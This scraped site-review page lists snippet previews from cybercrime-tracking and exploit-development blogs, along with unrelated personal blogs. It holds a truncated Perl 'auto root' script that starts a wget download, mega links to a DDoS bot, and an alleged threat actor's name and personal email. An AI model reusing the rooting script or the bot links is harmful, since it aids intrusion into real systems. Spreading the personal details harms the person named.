
cyb3rsleuth.blogspot.com
Tracking Cybercrime"A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage
http://cyb3rsleuth.blogspot.com/
"A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage
http://cyb3rsleuth.blogspot.com/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Saturday
LOAD TIME
0.6 seconds
PAGES IN
THIS WEBSITE
18
SSL
EXTERNAL LINKS
26
SITE IP
172.217.11.33
LOAD TIME
0.571 sec
SCORE
6.2
Tracking Cybercrime | cyb3rsleuth.blogspot.com Reviews
https://cyb3rsleuth.blogspot.com
"A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage
Tracking Cybercrime: September 2014
http://cyb3rsleuth.blogspot.com/2014_09_01_archive.html
A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage. Friday, 26 September 2014. September updates at Rescator Shop. Posted by Cyb3r Sleuth. Subscribe to: Posts (Atom). THN : The Hacker News. Does your WebCam Crash after Windows 10 Anniversary Update? Here’s How to Fix It. Malware Infected All Eddie Bauer Stores in U.S., Canada. I am lady" Linux.Lady trojan samples. DDanchev's Blog Going Private - Request Access.
Tracking Cybercrime: Chinese Threat Actor Part 5
http://cyb3rsleuth.blogspot.com/2013/02/chinese-threat-actor-part-5.html
A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage. Wednesday, 20 February 2013. Chinese Threat Actor Part 5. Follow up on Mandiant report. Http:/ intelreport.mandiant.com/Mandiant APT1 Report.pdf. One of the threat actor identified by Mandiant is "SuperHard M". His name is Mei Qiang and email is "mei qiang 82@sohu.com". 32261,'SuperHard M','bf787577ff656cde5b5d1f8236a75d2a', 'mei','mei qiang 82@sohu.com. 1,1130405749,' ,'. Mei qi...
Tracking Cybercrime: Styx Exploit Pack
http://cyb3rsleuth.blogspot.com/2013/04/styx-exploit-pack.html
A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage. Saturday, 20 April 2013. Cross posted from Underground forum ). Gentlemen, it's a time to announce a new next generation product for your viewing pleasure: Styx Vulnerability Browser Stress Test Platform 2.0. Updating via GIT from the master-server twice a day with any detect of any sploit;. No domains binding: you can specify any number of domains without rebuild;. Support for d...
Tracking Cybercrime: February 2014
http://cyb3rsleuth.blogspot.com/2014_02_01_archive.html
A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage. Wednesday, 5 February 2014. Storm - DDOS Bot. Https:/ mega.co.nz/#! MJYTS0nS4GbFRzfaVfnfKWbkp E8 w68rcuT3i9 Qp0. Https:/ mega.co.nz/#! StormBot серверная часть= =. Утилита предназначена ИСКЛЮЧИТЕЛЬНО для стресс-тестирования своих собственных сетей. За использования в незаконных целях автор ответсвенности не несет. Все модули бота находятся в одном бинарнике. Написан на чистом Си.
Tracking Cybercrime: March 2014
http://cyb3rsleuth.blogspot.com/2014_03_01_archive.html
A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage. Monday, 3 March 2014. Recent updates at Rescator Track2 Shop. Posted by Cyb3r Sleuth. Subscribe to: Posts (Atom). THN : The Hacker News. Does your WebCam Crash after Windows 10 Anniversary Update? Here’s How to Fix It. Malware Infected All Eddie Bauer Stores in U.S., Canada. I am lady" Linux.Lady trojan samples. DDanchev's Blog Going Private - Request Access.
TOTAL PAGES IN THIS WEBSITE
18
security-obscurity.blogspot.com
Security Obscurity Blog: About the new java 0 day vulnerability (CVE-2013-0422)
http://security-obscurity.blogspot.com/2013/01/about-new-java-0-day-vulnerability.html
Yes, another blog. Thursday, January 10, 2013. About the new java 0 day vulnerability (CVE-2013-0422). A couple of hours ago @Kafeine. Discovered a new java 0 day exploit in the wild. This exploit is served by most exploit kits like Blackhole, Cool exploit kit and Nuclear pack.When the malicious applet is executed its download and execute a copy of Zeus. A curious thing is that Zbot comes with a self signed digital certificate. But detection rate is quite good with 12/46 link. You can find both files here.
security-obscurity.blogspot.com
Security Obscurity Blog: March 2013
http://security-obscurity.blogspot.com/2013_03_01_archive.html
Yes, another blog. Tuesday, March 19, 2013. 32 AntiVirus versus the latest Java Exploit (CVE-2013-1493). Image a scenario where someone wants to target. Your computer to get access to your files. This task can be accomplished in several ways and one of them is using a java exploit on a crafted/compromised website. What i want to test is how AntiVirus manage "unknown" threads or forbidden behavior (an unsigned applet shouldn't be allowed to download files to your local disk). The exploit is CVE-2013-1493.
security-obscurity.blogspot.com
Security Obscurity Blog: January 2013
http://security-obscurity.blogspot.com/2013_01_01_archive.html
Yes, another blog. Thursday, January 10, 2013. About the new java 0 day vulnerability (CVE-2013-0422). A couple of hours ago @Kafeine. Discovered a new java 0 day exploit in the wild. This exploit is served by most exploit kits like Blackhole, Cool exploit kit and Nuclear pack.When the malicious applet is executed its download and execute a copy of Zeus. A curious thing is that Zbot comes with a self signed digital certificate. But detection rate is quite good with 12/46 link. You can find both files here.
security-obscurity.blogspot.com
Security Obscurity Blog: March 2012
http://security-obscurity.blogspot.com/2012_03_01_archive.html
Yes, another blog. Tuesday, March 13, 2012. Build Metasploit Module (Windows Exploit Development). This is the continuation of my previous post Windows Exploit Development (Remote Stack BoF. Let's try to convert the standalone exploit for vserver to a metasploit module. If you think that this task is complicated you're wrong because what we need, is only a template taken from this. Corelan tutorial and edit few things. How much space we have for the shellcode (2062 bytes). Now it's time to use it.
security-obscurity.blogspot.com
Security Obscurity Blog: 32 AntiVirus versus the latest Java Exploit (CVE-2013-1493)
http://security-obscurity.blogspot.com/2013/03/32-antivirus-versus-latest-java-exploit.html
Yes, another blog. Tuesday, March 19, 2013. 32 AntiVirus versus the latest Java Exploit (CVE-2013-1493). Image a scenario where someone wants to target. Your computer to get access to your files. This task can be accomplished in several ways and one of them is using a java exploit on a crafted/compromised website. What i want to test is how AntiVirus manage "unknown" threads or forbidden behavior (an unsigned applet shouldn't be allowed to download files to your local disk). The exploit is CVE-2013-1493.
security-obscurity.blogspot.com
Security Obscurity Blog: December 2011
http://security-obscurity.blogspot.com/2011_12_01_archive.html
Yes, another blog. Wednesday, December 7, 2011. Ubuntu Server Exploit (Local Privilege Escalation). Today we're gonna talk about an "old" vulnerability discovered by Dan Rosenberg in the linux kernel. This bug affect versions previous than 2.6.38 and permit to an user with low privileges to gain root access. Link to exploit: Linux Kernel = 2.6.37 Local Privilege Escalation. The text below is taked from exploit description. Awesomeforum.dot (with ubuntu server 10.04 kernel 2.6.32 ). Ubuntu Server Exploit ...
security-obscurity.blogspot.com
Security Obscurity Blog: December 2012
http://security-obscurity.blogspot.com/2012_12_01_archive.html
Yes, another blog. Friday, December 7, 2012. Attacking Windows 8 with Java Exploit and Metasploit. In the last post i was talking about how to obfuscate a Java exploit (CVE-2012-4681 link here. Now i want to show you how an attacker can use this obfuscated exploit for a targeted. This is intended to be the second part of Wordpress Cookie Grabber. Video because i will show what you can do once you have compromised a website, frank's blog in this case. The victim will be only the administrator. A powerfull...
security-obscurity.blogspot.com
Security Obscurity Blog: February 2012
http://security-obscurity.blogspot.com/2012_02_01_archive.html
Yes, another blog. Wednesday, February 1, 2012. Windows Exploit Development Remote Stack BoF. This time i made a video about basic exploit development process on windows. The target machine is a Windows Server 2003 R2 with DEP disabled running a vulnerable software called vserver. Basically the vulnerable software is listening on TCP port 15000 waiting for some input and if you provide a string bigger than 15 characters it will crash. You can find his tutorial here. Corelan Exploit Stack Based Overflows.
security-obscurity.blogspot.com
Security Obscurity Blog: October 2012
http://security-obscurity.blogspot.com/2012_10_01_archive.html
Yes, another blog. Tuesday, October 2, 2012. Google winning award email scam. Just a quick post, because i've never seen this type of scam (using google as vector), but i think it's an old technique. I have won a cash price from google, but why gmail moved the email to spam section? Graphics seems to be created with paint, because is horrible. If they have to convince people to send their credentials, at least make a better template. Posted by Security Obscurity. Subscribe to: Posts (Atom).
TOTAL LINKS TO THIS WEBSITE
26
Tips dan Trik
Senin, 10 Agustus 2015. Semua perangkat ini saya beli dari hasil pendapatan WHAFF Rewards. Dan bukan membeli yang Black Market atau Garansi Toko, tapi yang resmi bergaransi Sony Indonesia. Ketika account PayPal dari pendapatan WHAFF Rewards sudah mencapai $700 saya tarik ke BCA dengan kurs Rp.13.100/1 USD. Tidak melalui cicilan kartu kredit. Bahkan tidak menggunakan kartu kredit. Hanya transfer cash pada penjualnya langsung JPC Kemang. Demikian juga dengan perangkat tambahannya. Kirimkan Ini lewat Email.
Cyb3rsaint | Tips Trik @wordpress.com
Tips Trik @wordpress.com. Stay updated via RSS. Top Posts and Halaman. Tutorial] TVMC untuk Android. Panduan Membeli Camera Apps pada situs Sony PlayMemories. Panduan Membeli Camera Apps pada situs Sony PlayMemories. Nissin i40 Sony Multi Interface Unboxing. Follow Cyb3rsaint on WordPress.com. Panduan Membeli Camera Apps pada situs Sony PlayMemories. Posted: April 9, 2016 in Uncategorized. Tag: panduan membeli camera apps playmemories. Baca entri selengkapnya ». Posted: Maret 23, 2016 in camera review.
Cyb3rScythe (Cyber Scythe) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 2 Months. This deviant's full pageview. Last Visit: 2 hours ago. This is the place where you can personalize your profile! So, as y...
Cyb3rsec.org
Just another security research group. Perl] – auto root. July 25th, 2014. Link: http:/ pastebin.com/u/n4sss. If public , send the credits! ROOT YOUR LNX BSD SUNOS (-: #. By n4sss. #. Brazilians Defacers. 2012 #. Print "# # # # # # # # # # # # # # # # # # # n";. Print " n4sss r00t y0ur b0x n";. Print " - To root Lnx: perl $0 lnx n";. Print " - To root Bsd: perl $0 bsd n";. Print " - To root SunOS: perl $0 sunos n";. Print " - root with pkexec: perl $0 pkexec n";. If ($ARGV[0] = "pkexec" ). System("wget ht...
Tracking Cybercrime
A sneak peek view in to the world of Cybercriminals". Tracking Malware, Exploit Kits, Spam, Affiliates, Carding and Espionage. Sunday, 17 January 2016. Rescator Jan 2016 update. As on January 2016. Posted by Cyb3r Sleuth. Tuesday, 7 July 2015. Rescator June 2015 update. Posted by Cyb3r Sleuth. Friday, 26 September 2014. September updates at Rescator Shop. Posted by Cyb3r Sleuth. Monday, 3 March 2014. Recent updates at Rescator Track2 Shop. Posted by Cyb3r Sleuth. Wednesday, 5 February 2014. Защита по hwi...
Coming Soon - Future home of something quite cool
Future home of something quite cool. If you're the site owner. To launch this site. If you are a visitor. Please check back soon.
cYb3R_SpY's WebBlog | The technology and computer programming web blog
CYb3R SpY's WebBlog. The technology and computer programming web blog. Accessing the internet with your Skype Phone (WP-S1) on Mac via Bluetooth. December 3, 2008. Well, the title is very suggestive. That’s exactly what I’m going to show you how to do. Here is how you do it. 8211; on your skype phone (WP-S1) go to [Menu]- [Settings]- [Connectivity]- [Modem Connection]. 8211; you have two options [via bluetooth] and [via usb]. Make sure to select [via bluetooth] and click [OK]. Phone Model]: GPRS (GSM/3G).
SOCIAL ENGAGEMENT